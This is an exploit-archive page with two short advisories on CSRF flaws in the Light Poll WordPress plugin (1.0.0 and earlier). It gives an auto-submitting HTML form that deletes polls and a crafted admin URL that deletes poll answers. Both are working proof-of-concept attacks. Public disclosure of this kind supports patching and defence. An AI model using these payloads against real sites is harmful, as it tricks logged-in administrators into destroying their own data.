Share
## https://sploitus.com/exploit?id=PACKETSTORM:180081
# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: vulns@vulnseeker.org  
  
Description  
  
The plugin does not have CSRF checks when deleting polls, which could allow  
attackers to make logged in users perform such action via a CSRF attack  
  
Proof of Concept  
  
<html>  
<body>  
<form action="http://localhost/wp-admin/admin.php">  
<input type="hidden" name="page" value="lp_settings" />  
<input type="hidden" name="task" value="remove" />  
<input type="hidden" name="id" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
history.pushState('', '', '/');  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
Reference:  
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/  
  
  
  
  
# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: vulns@vulnseeker.org  
  
Description  
  
The plugin does not have CSRF checks in some places, which could allow  
attackers to make logged in users perform unwanted actions via CSRF attacks  
  
Proof of Concept  
  
Where <<POLL_ID>> and <<ANSWER_ID>> are valid:  
  
https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=  
<<POLL_ID>>&answer_id=<<ANSWER_ID>>  
  
Reference:  
https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/